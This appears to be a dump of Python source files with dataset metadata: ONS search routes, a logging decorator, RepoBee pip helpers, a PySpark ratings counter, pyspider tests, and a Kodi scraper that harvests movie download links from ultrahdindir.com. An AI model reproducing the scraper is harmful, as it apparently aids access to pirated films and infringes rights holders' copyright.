@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
    """
    Execute a content query against the ONS index.
    :param request:
    :return:
    """
    # Optionally redirect to the conceptual search implementation
    if CONFIG.API.redirect_conceptual_search:
        return await conceptual_routes.conceptual_content_query(request)
    engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
    result: SearchResult = await engine.content_query(request)
    return json(request, result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
    """
    Execute a type-counts query against the ONS index.
    :param request:
    :return:
    """
    # Optionally redirect to the conceptual search implementation
    if CONFIG.API.redirect_conceptual_search:
        return await conceptual_routes.conceptual_counts_query(request)
    engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
    result: SearchResult = await engine.type_counts_query(request)
    return json(request, result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
    """
    Execute a featured-result query (product and home page census pages).
    :param request:
    :return:
    """
    # Featured results always come from the ONS index; no conceptual redirect
    engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
    result: SearchResult = await engine.featured_result_query(request)
    return json(request, result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
    """
    Search for a page by its uri.
    :param request:
    :param path:
    :return:
    """
    # NOTE(review): the bare '/uri/' route supplies no `path` argument —
    # verify sanic provides a default for that route, else it raises.
    engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
    result: SearchResult = await engine.search_by_uri(request, path)
    return json(request, result.to_dict(), 200)
| 34.304
| 90
| 0.752332
|
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
search_result: SearchResult = await sanic_search_engine.departments_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.search(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
result = await sanic_search_engine.search(request)
return json(request, result, 200)
@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_content_query(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.content_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_counts_query(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.type_counts_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.featured_result_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.search_by_uri(request, path)
return json(request, search_result.to_dict(), 200)
| true
| true
|
f7053bc53f930cd972b3fb116080db388c2bf1b4
| 562
|
py
|
Python
|
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | null | null | null |
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | 4
|
2020-03-24T17:40:50.000Z
|
2021-06-02T00:25:27.000Z
|
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from common_utils.new_log import NewLog
class LogDecorator:
    """Decorator that logs entry, arguments and return value of the wrapped callable.

    Usage: ``@LogDecorator()`` above any function; all messages go to the
    module logger at DEBUG level.
    """

    log = NewLog(__name__)
    logger = log.get_log()

    def __call__(self, func):
        # Local import so this fix needs no change to the module's imports.
        from functools import wraps

        # Fix: without functools.wraps the wrapper masked the wrapped
        # function's __name__/__doc__, breaking introspection and making
        # stacked decorators log "wrapper" instead of the real name.
        @wraps(func)
        def wrapper(*args, **kw):
            self.logger.debug("call method %s ===============" % func.__name__)
            self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
            result = func(*args, **kw)
            self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
            return result
        return wrapper
| 29.578947
| 100
| 0.553381
|
from common_utils.new_log import NewLog
class LogDecorator:
    """Decorator that logs entry, arguments and return value of the wrapped callable."""
    # class-level logger shared by every decorated function
    log = NewLog(__name__)
    logger = log.get_log()
    def __call__(self, func):
        def wrapper(*args, **kw):
            # log entry and inputs, run the function, then log the result
            self.logger.debug("call method %s ===============" % func.__name__)
            self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
            result = func(*args, **kw)
            self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
            return result
        # NOTE(review): wrapper is not wrapped with functools.wraps, so the
        # decorated function's __name__/__doc__ are masked
        return wrapper
| true
| true
|
f7053c939c0ae2e74aeebb8a418132b816d2cc31
| 6,017
|
py
|
Python
|
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | 11
|
2018-12-21T22:52:37.000Z
|
2021-09-02T02:13:50.000Z
|
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | null | null | null |
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | 1
|
2020-02-01T19:52:36.000Z
|
2020-02-01T19:52:36.000Z
|
# -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
    """Scraper source for ultrahdindir.com: finds debrid-only hoster links
    for a movie by searching the site and parsing result pages.

    Python-2-era code (urllib.urlencode / urlparse / str.encode); the broad
    bare ``except`` blocks are this add-on family's convention: any failure
    degrades to "no sources" rather than crashing the scrape.
    """
    def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['ultrahdindir.com']
        self.base_link = 'http://ultrahdindir.com'
        # site search endpoint, queried via POST in sources()
        self.post_link = '/index.php?do=search'
    def movie(self, imdb, title, localtitle, aliases, year):
        # Return an urlencoded imdb/title/year payload consumed by sources();
        # None on any failure.
        try:
            url = {'imdb': imdb, 'title': title, 'year': year}
            url = urllib.urlencode(url)
            return url
        except:
            return
    def sources(self, url, hostDict, hostprDict):
        # Resolve the payload from movie() into a list of stream dicts:
        # {source, quality, language, url, info, direct, debridonly}.
        try:
            sources = []
            if url == None: return sources
            # links are debrid-only, so bail out if no debrid account is set up
            if debrid.status() is False: raise Exception()
            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
            title = data['title'].replace(':','').lower()
            year = data['year']
            # sanitise the search query for the site's search form
            query = '%s %s' % (data['title'], data['year'])
            query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
            url = urlparse.urljoin(self.base_link, self.post_link)
            post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
            r = client.request(url, post=post)
            r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
            # keep only result boxes that mention the requested imdb id,
            # then extract (href, link text) pairs from their title links
            r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
            r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
            r = [(i[0].attrs['href'], i[0].content) for i in r if i]
            hostDict = hostprDict + hostDict
            for item in r:
                try:
                    name = item[1]
                    # reject results whose "(year)" does not match the request
                    y = re.findall('\((\d{4})\)', name)[0]
                    if not y == year: raise Exception()
                    # file size as shown in the result title, '0' if absent
                    s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
                    s = s[0] if s else '0'
                    # fetch the detail page and scrape (release name, link) pairs
                    data = client.request(item[0])
                    data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
                    data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
                                      data[0].content, re.DOTALL)
                    u = [(i[0], i[1], s) for i in data if i]
                    for name, url, size in u:
                        try:
                            # infer quality label from markers in the release name
                            if '4K' in name:
                                quality = '4K'
                            elif '1080p' in name:
                                quality = '1080p'
                            elif '720p' in name:
                                quality = '720p'
                            elif any(i in ['dvdscr', 'r5', 'r6'] for i in name):
                                quality = 'SCR'
                            elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']
                                     for i in name):
                                quality = 'CAM'
                            else: quality = '720p'
                            info = []
                            if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
                            if any(i in ['hevc', 'h265', 'x265'] for i in name): info.append('HEVC')
                            # normalise the size string to "X.XX GB"; best effort
                            try:
                                size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
                                div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
                                size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
                                size = '%.2f GB' % size
                                info.append(size)
                            except:
                                pass
                            info = ' | '.join(info)
                            url = client.replaceHTMLCodes(url)
                            url = url.encode('utf-8')
                            # skip archives and (presumably) Turkish-dubbed releases
                            if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
                            # ftp links are directly playable; others go via turbobit
                            if 'ftp' in url: host = 'COV'; direct = True;
                            else: direct = False; host= 'turbobit.net'
                            #if not host in hostDict: continue
                            host = client.replaceHTMLCodes(host)
                            host = host.encode('utf-8')
                            sources.append({'source': host, 'quality': quality, 'language': 'en',
                                            'url': url, 'info': info, 'direct': direct, 'debridonly': True})
                        except:
                            pass
                except:
                    pass
            return sources
        except:
            return sources
    def resolve(self, url):
        # links are already final; nothing to resolve
        return url
| 41.784722
| 127
| 0.442081
|
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['ultrahdindir.com']
self.base_link = 'http://ultrahdindir.com'
self.post_link = '/index.php?do=search'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() is False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title'].replace(':','').lower()
year = data['year']
query = '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = urlparse.urljoin(self.base_link, self.post_link)
post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
r = client.request(url, post=post)
r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
r = [(i[0].attrs['href'], i[0].content) for i in r if i]
hostDict = hostprDict + hostDict
for item in r:
try:
name = item[1]
y = re.findall('\((\d{4})\)', name)[0]
if not y == year: raise Exception()
s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
s = s[0] if s else '0'
data = client.request(item[0])
data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
data[0].content, re.DOTALL)
u = [(i[0], i[1], s) for i in data if i]
for name, url, size in u:
try:
if '4K' in name:
quality = '4K'
elif '1080p' in name:
quality = '1080p'
elif '720p' in name:
quality = '720p'
elif any(i in ['dvdscr', 'r5', 'r6'] for i in name):
quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']
for i in name):
quality = 'CAM'
else: quality = '720p'
info = []
if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
if any(i in ['hevc', 'h265', 'x265'] for i in name): info.append('HEVC')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
size = '%.2f GB' % size
info.append(size)
except:
pass
info = ' | '.join(info)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
if 'ftp' in url: host = 'COV'; direct = True;
else: direct = False; host= 'turbobit.net'
#if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en',
'url': url, 'info': info, 'direct': direct, 'debridonly': True})
except:
pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
| true
| true
|
f7053cb96e078cbb641803774c57e3d6c47395cc
| 5,903
|
py
|
Python
|
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
"""Helper functions for the distribution."""
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
    """Raised when pip's dependency resolution fails during an install."""


def get_installed_plugins_path() -> pathlib.Path:
    """Return the path of the distribution's installed_plugins.json file."""
    install_dir = distinfo.INSTALL_DIR
    assert install_dir
    return install_dir / "installed_plugins.json"
def get_installed_plugins(
    installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
    """Return the contents of installed_plugins.json without private metainfo."""
    plugins = _get_installed_plugins(installed_plugins_path)
    # strip the private metainfo section before handing the dict out
    plugins.pop("_metainfo", None)
    return plugins


def _get_installed_plugins(
    installed_plugins_path: Optional[pathlib.Path] = None,
):
    """Return the raw contents of installed_plugins.json, metainfo included."""
    path = installed_plugins_path or get_installed_plugins_path()
    return json.loads(path.read_text("utf8"))


def write_installed_plugins(
    installed_plugins: dict,
    installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
    """Write installed_plugins.json, merging in any metainfo already on disk."""
    path = installed_plugins_path or get_installed_plugins_path()
    # existing metainfo survives unless explicitly overridden by the caller
    merged_meta = _get_installed_plugins(path).get("_metainfo") or {}
    merged_meta.update(installed_plugins.get("_metainfo") or {})
    to_write = {**installed_plugins, "_metainfo": merged_meta}
    path.write_text(json.dumps(to_write, indent=4), encoding="utf8")


def get_active_plugins(
    installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
    """Read the list of active plugins from installed_plugins.json."""
    meta = _get_installed_plugins(installed_plugins_path).get("_metainfo") or {}
    return meta.get("active_plugins") or []


def write_active_plugins(
    active_plugins: List[str],
    installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
    """Persist the list of active plugins to installed_plugins.json."""
    plugins = _get_installed_plugins(installed_plugins_path)
    plugins.setdefault("_metainfo", {})["active_plugins"] = active_plugins
    write_installed_plugins(plugins, installed_plugins_path)
def get_pip_path() -> pathlib.Path:
    """Return the path to the pip executable in the install's virtualenv."""
    install_dir = distinfo.INSTALL_DIR
    assert install_dir
    return install_dir / "env" / "bin" / "pip"


def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
    """Fetch and parse the plugins.json file.

    Args:
        url: URL to the plugins.json file.
    Returns:
        A dictionary with the contents of the plugins.json file.
    Raises:
        plug.PlugError: If the file cannot be fetched.
    """
    response = requests.get(url)
    if response.status_code != 200:
        plug.log.error(response.content.decode("utf8"))
        raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
    return response.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
    """Return builtin plugins in the same shape as the plugins.json dict."""

    def _description_of(plugin_name):
        # a plugin module may omit PLUGIN_DESCRIPTION; show "-" in that case
        mod = importlib.import_module(f"{ext_pkg.__name__}.{plugin_name}")
        return mod.__dict__.get("PLUGIN_DESCRIPTION") or "-"

    builtins = {}
    for name in plugin.get_module_names(ext_pkg):
        builtins[name] = dict(
            description=_description_of(name),
            url=f"https://repobee.readthedocs.io/"
            f"en/stable/builtins.html#{name}",
            versions={"N/A": {}},
            builtin=True,
        )
    return builtins
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
    """Run the ``pip`` executable of the distribution's virtual environment.

    Args:
        command: The pip subcommand to execute (e.g. "install" or "list").
        args: Positional arguments passed to pip in order; flags (e.g.
            ``--pre``) also go here.
        kwargs: Turned into ``--key value`` CLI options; a value of ``True``
            passes the option as a bare flag (``--key``).
    Returns:
        The completed pip subprocess.
    Raises:
        DependencyResolutionError: If the 2020-resolver fails to resolve
            dependencies.
    """
    options = []
    for key, val in kwargs.items():
        flag = f"--{key.replace('_', '-')}"
        # True means "pass as a bare flag"; anything else becomes --key=value
        options.append(flag if val is True else f"{flag}={val}")
    env = dict(os.environ)
    if command == "install":
        # the resolver allows us to avoid installing plugins that are
        # incompatible with the current version of RepoBee
        options.append("--use-feature=2020-resolver")
        # REPOBEE_INSTALL_DIR must be available when upgrading RepoBee,
        # or the dist plugins aren't activated
        env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
        # due to the hack in setup.py to edit the distinfo, we must build
        # RepoBee from source
        options.append("--no-binary=repobee")
    proc = subprocess.run(
        [str(get_pip_path()), command, *args, *options],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        env=env,
    )
    if proc.returncode != 0:
        stderr = proc.stderr.decode(sys.getdefaultencoding())
        plug.log.error(stderr)
        if "ResolutionImpossible" in stderr:
            raise DependencyResolutionError()
    return proc
| 32.256831
| 79
| 0.671015
|
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
def get_installed_plugins_path() -> pathlib.Path:
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "installed_plugins.json"
def get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
installed_plugins = _get_installed_plugins(installed_plugins_path)
if "_metainfo" in installed_plugins:
del installed_plugins["_metainfo"]
return installed_plugins
def _get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
):
return json.loads(
(installed_plugins_path or get_installed_plugins_path()).read_text(
"utf8"
)
)
def write_installed_plugins(
installed_plugins: dict,
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
path = installed_plugins_path or get_installed_plugins_path()
metainfo = _get_installed_plugins(path).get("_metainfo") or {}
metainfo.update(installed_plugins.get("_metainfo") or {})
installed_plugins_write = dict(installed_plugins)
installed_plugins_write["_metainfo"] = metainfo
path.write_text(
json.dumps(installed_plugins_write, indent=4), encoding="utf8"
)
def get_active_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
installed_plugins = _get_installed_plugins(installed_plugins_path)
return (installed_plugins.get("_metainfo") or {}).get(
"active_plugins"
) or []
def write_active_plugins(
active_plugins: List[str],
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
installed_plugins = _get_installed_plugins(installed_plugins_path)
installed_plugins.setdefault("_metainfo", {})[
"active_plugins"
] = active_plugins
write_installed_plugins(installed_plugins, installed_plugins_path)
def get_pip_path() -> pathlib.Path:
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "env" / "bin" / "pip"
def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
resp = requests.get(url)
if resp.status_code != 200:
plug.log.error(resp.content.decode("utf8"))
raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
return resp.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
def _get_plugin_description(name):
return (
importlib.import_module(f"{ext_pkg.__name__}.{name}").__dict__.get(
"PLUGIN_DESCRIPTION"
)
or "-"
)
return {
name: dict(
description=_get_plugin_description(name),
url=f"https://repobee.readthedocs.io/"
f"en/stable/builtins.html#{name}",
versions={"N/A": {}},
builtin=True,
)
for name in plugin.get_module_names(ext_pkg)
}
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
cli_kwargs = [
f"--{key.replace('_', '-')}"
+ (f"={val}" if val is not True else "")
for key, val in kwargs.items()
]
env = dict(os.environ)
if command == "install":
cli_kwargs.append("--use-feature=2020-resolver")
env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
# due to the hack in setup.py to edit the distinfo, we must build
# RepoBee from source
cli_kwargs.append("--no-binary=repobee")
cmd = [str(get_pip_path()), command, *args, *cli_kwargs]
proc = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
if proc.returncode != 0:
stderr = proc.stderr.decode(sys.getdefaultencoding())
plug.log.error(stderr)
if "ResolutionImpossible" in stderr:
raise DependencyResolutionError()
return proc
| true
| true
|
f7053dfef19a421a63c39a67f749f72d485326f3
| 440
|
py
|
Python
|
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
from pyspark import SparkConf, SparkContext
import collections

# Count how often each star rating appears in the MovieLens 100k data set.
spark_conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
sc = SparkContext(conf=spark_conf)

# u.data rows are whitespace separated; field 3 (index 2) is the rating.
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda row: row.split()[2])
rating_counts = ratings.countByValue()

# Print the histogram ordered by rating value.
ordered_counts = collections.OrderedDict(sorted(rating_counts.items()))
for rating, count in ordered_counts.items():
    print("%s %i" % (rating, count))
| 31.428571
| 68
| 0.738636
|
from pyspark import SparkConf, SparkContext
import collections
# Count how often each star rating appears in the MovieLens 100k data set.
conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
sc = SparkContext(conf = conf)
# u.data rows are whitespace separated; field 3 (index 2) is the rating.
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda x: x.split()[2])
result = ratings.countByValue()
# Print the histogram ordered by rating value.
sortedResults = collections.OrderedDict(sorted(result.items()))
for key, value in sortedResults.items():
    print("%s %i" % (key, value))
| true
| true
|
f705402b1b08aa6730ba341cc50c68502d1b99d6
| 17,851
|
py
|
Python
|
tests/test_scheduler.py
|
atlas555/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | 5
|
2015-03-31T13:25:25.000Z
|
2016-03-14T11:17:02.000Z
|
tests/test_scheduler.py
|
e-dorigatti/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scheduler.py
|
e-dorigatti/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | 1
|
2016-02-17T23:12:47.000Z
|
2016-02-17T23:12:47.000Z
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-08 22:37:13
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
    """Exercises TaskQueue priority/time/processing behaviour.

    The numbered test methods are order dependent and share one queue
    created in setUpClass.
    """
    @classmethod
    def setUpClass(self):
        # NOTE(review): the parameter is conventionally named `cls` here
        self.task_queue = TaskQueue()
        # very high rate/burst effectively disables rate limiting for tests
        self.task_queue.rate = 100000
        self.task_queue.burst = 100000
        # tasks not reported done within 0.5s are treated as timed out
        self.task_queue.processing_timeout = 0.5
    def test_10_put(self):
        # a3/a4 are scheduled in the future; a2/a1 are available immediately
        self.task_queue.put('a3', 0, time.time() + 0.5)
        self.task_queue.put('a4', 3, time.time() + 0.2)
        self.task_queue.put('a2', 0)
        self.task_queue.put('a1', 1)
        self.assertEqual(self.task_queue.size(), 4)
    def test_20_update(self):
        # re-putting an existing task updates it in place; size is unchanged
        self.task_queue.put('a2', 4)
        self.assertEqual(self.task_queue.size(), 4)
        self.task_queue.put('a3', 2, 0)
        self.assertEqual(self.task_queue.size(), 4)
    def test_30_get_from_priority_queue(self):
        # a2 now has the highest priority (4) after the update above
        self.assertEqual(self.task_queue.get(), 'a2')
        self.assertEqual(self.task_queue.size(), 4)
    def test_40_time_queue_1(self):
        # a3's scheduled time was reset to 0, so it is available after update
        self.task_queue.check_update()
        self.assertEqual(self.task_queue.get(), 'a3')
        self.assertEqual(self.task_queue.size(), 4)
    def test_50_time_queue_2(self):
        # after 0.3s a4's scheduled time (now + 0.2) has passed
        time.sleep(0.3)
        self.task_queue.check_update()
        self.assertEqual(self.task_queue.get(), 'a4')
        self.assertEqual(self.task_queue.get(), 'a1')
        self.assertEqual(self.task_queue.size(), 4)
    def test_60_processing_queue(self):
        # past the processing timeout, previously fetched tasks are re-queued
        time.sleep(0.5)
        self.task_queue.check_update()
        self.assertEqual(self.task_queue.get(), 'a2')
        self.assertEqual(len(self.task_queue), 4)
        self.assertEqual(self.task_queue.get(), 'a4')
        self.assertEqual(self.task_queue.get(), 'a3')
        self.assertEqual(self.task_queue.get(), 'a1')
        self.assertEqual(len(self.task_queue), 4)
    def test_70_done(self):
        # marking tasks done removes them from the queue entirely
        self.assertTrue(self.task_queue.done('a2'))
        self.assertTrue(self.task_queue.done('a1'))
        self.assertEqual(len(self.task_queue), 2)
        self.assertTrue(self.task_queue.done('a4'))
        self.assertTrue(self.task_queue.done('a3'))
        self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
